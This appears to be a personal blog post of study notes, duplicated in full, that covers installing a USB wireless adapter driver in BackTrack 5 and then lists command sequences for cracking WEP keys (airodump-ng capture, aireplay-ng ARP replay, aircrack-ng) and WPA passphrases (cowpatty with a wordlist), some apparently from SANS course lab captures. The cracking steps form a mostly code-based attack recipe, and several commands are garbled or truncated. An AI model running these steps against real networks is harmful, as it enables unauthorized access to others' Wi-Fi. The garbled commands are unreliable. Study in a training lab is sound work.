Configure Wirelesss Lan in Backtrack 5R1 (Ubuntu)
a. Download the utility (wireless lan card drivers) in a XP box. copy the rtl8187B.sys & rtl8187B.inf files where these two files can be downloaded to the BT linux.
b. Open a Terminal (Applications, Accessories, Terminal) and type "sudo apt-get install ndisgtk" and press "Enter." Type "sudo apt-get install ndiswrapper-common" and "sudo apt-get install ndiswrapper-utils," both followed by "Enter." This installs Ndiswrapper, a utility for installing Windows devices drivers in Linux.
c. Plug in your TEW-424UB and insert the vendor CD into the disc drive and double-click the desktop icon to view its contents. Open the "Drivers" folder and navigate to "Windows XP." Drag the drivers (both SYS and INF) from this folder onto Ubuntu's desktop.
d. Type "sudo ndiswrapper -i /home/USERNAME/Desktop/Sis163u.INF," replacing USERNAME with your Ubuntu username, and press "Enter." Type "sudo modprobe ndiswrapper" and "sudo ndiswrapper -m," both followed by "Enter." This installs your TrendNet TEW-424UB wireless adapter.
e. iwlist wlan0 scan should give you results. get your essid and type:
sudo iwconfig wlan0 essid YourEssid
sudo dhclient3 wlan0 #to do dhcp else, use ifconfig wlan0.
you should be set.
f. use wicd network manager to enter the shared key
Read more: How do I install trendnet TEW-424 UB Wireless G USB Adapter - JustAnswer http://www.justanswer.com/computer/3anhb-install-trendnet-tew-424-ub-wireless-usb-adapter.html#ixzz1e7zxljhj
http://wn.com/Monitor_your_network_with_Backtrack_3
a) $airodump-ng w out c 1 bssid 00:00:00:00:00:00 wlan0
b) a client is conneted to the AP. we will be able to use the attack airreplay-ng -3 (ARP replay) to push the data and crack the WEP key
$aireplay-ng -3 -e linksys -a 00:00:00:00:00:00 -b 00:00:00:00:00 -h 00:00:00:00:00:00 -x 600 -r out.01.cap wlan0
c) $aircrack ng out 01.cap
--------------------
a. using.560.sans. cracking WEP
to cpature the traffic. first cmd put the interface in the monitor mode, listenig on chanel 6, then
capture the packets and store them in a pcap file
nn = dont convert address to names or print domain name of host names
-i = interface followed by the interface name
-s = snaplen. should limit snaplen to the smallest number that will capture the protocol information you're interested in.
-w = write to the file followed by the name of the file.
# iwconfig eth1 mode monitor channel 6
# tcpdump -nn -i eth1 -s0 -w [file.pcap]
# cp /home/tools/wep_crack.pcap /tmp
# /usr/sbin/tcpdump -nnr /tmp/wep_crack.pcap | grep "Beacon"
you should see the SSID in paraenthesis after the word Beacon
if you leave off the -e option, Aircrack-ng will let you chose which SSID traffic you wish to crack. if only one is present, Aircrack will proceed with the crack. you should see the key once aircrack is done.
# cd /home/tools/aircrack-ng-1.0-rc1
# ./aircrack-ng -e "560gc" /tmp/wep_crack.pcap
crack WPA
=========
go away 2 is this SSID
# cp /home/tools/wpa_crack.pcap /tmp
# wireshark -r /tmp/wpa_crack.pcap &
# cd /home/tools/cowpatty-4.2
# ./cowpatty -r /tmp/wpa_crack.pcap -s "go away 2" -f /home/tools/john-1.7.2/run/password.lst
a. Download the utility (wireless lan card drivers) in a XP box. copy the rtl8187B.sys & rtl8187B.inf files where these two files can be downloaded to the BT linux.
b. Open a Terminal (Applications, Accessories, Terminal) and type "sudo apt-get install ndisgtk" and press "Enter." Type "sudo apt-get install ndiswrapper-common" and "sudo apt-get install ndiswrapper-utils," both followed by "Enter." This installs Ndiswrapper, a utility for installing Windows devices drivers in Linux.
c. Plug in your TEW-424UB and insert the vendor CD into the disc drive and double-click the desktop icon to view its contents. Open the "Drivers" folder and navigate to "Windows XP." Drag the drivers (both SYS and INF) from this folder onto Ubuntu's desktop.
d. Type "sudo ndiswrapper -i /home/USERNAME/Desktop/Sis163u.INF," replacing USERNAME with your Ubuntu username, and press "Enter." Type "sudo modprobe ndiswrapper" and "sudo ndiswrapper -m," both followed by "Enter." This installs your TrendNet TEW-424UB wireless adapter.
e. iwlist wlan0 scan should give you results. get your essid and type:
sudo iwconfig wlan0 essid YourEssid
sudo dhclient3 wlan0 #to do dhcp else, use ifconfig wlan0.
you should be set.
f. use wicd network manager to enter the shared key
Read more: How do I install trendnet TEW-424 UB Wireless G USB Adapter - JustAnswer http://www.justanswer.com/computer/3anhb-install-trendnet-tew-424-ub-wireless-usb-adapter.html#ixzz1e7zxljhj
http://wn.com/Monitor_your_network_with_Backtrack_3
a) $airodump-ng w out c 1 bssid 00:00:00:00:00:00 wlan0
b) a client is conneted to the AP. we will be able to use the attack airreplay-ng -3 (ARP replay) to push the data and crack the WEP key
$aireplay-ng -3 -e linksys -a 00:00:00:00:00:00 -b 00:00:00:00:00 -h 00:00:00:00:00:00 -x 600 -r out.01.cap wlan0
c) $aircrack ng out 01.cap
--------------------
a. using.560.sans. cracking WEP
to cpature the traffic. first cmd put the interface in the monitor mode, listenig on chanel 6, then
capture the packets and store them in a pcap file
nn = dont convert address to names or print domain name of host names
-i = interface followed by the interface name
# iwconfig eth1 mode monitor channel 6
# tcpdump -nn -i eth1 -s0 -w [file.pcap]
# cp /home/tools/wep_crack.pcap /tmp
# /usr/sbin/tcpdump -nnr /tmp/wep_crack.pcap | grep "Beacon"
you should see the SSID in paraenthesis after the word Beacon
if you leave off the -e option, Aircrack-ng will let you chose which SSID traffic you wish to crack. if only one is present, Aircrack will proceed with the crack. you should see the key once aircrack is done.
# cd /home/tools/aircrack-ng-1.0-rc1
# ./aircrack-ng -e "560gc" /tmp/wep_crack.pcap
crack WPA
=========
go away 2 is this SSID
# cp /home/tools/wpa_crack.pcap /tmp
# wireshark -r /tmp/wpa_crack.pcap &
# cd /home/tools/cowpatty-4.2
# ./cowpatty -r /tmp/wpa_crack.pcap -s "go away 2" -f /home/tools/john-1.7.2/run/password.lst
Comments
Post a Comment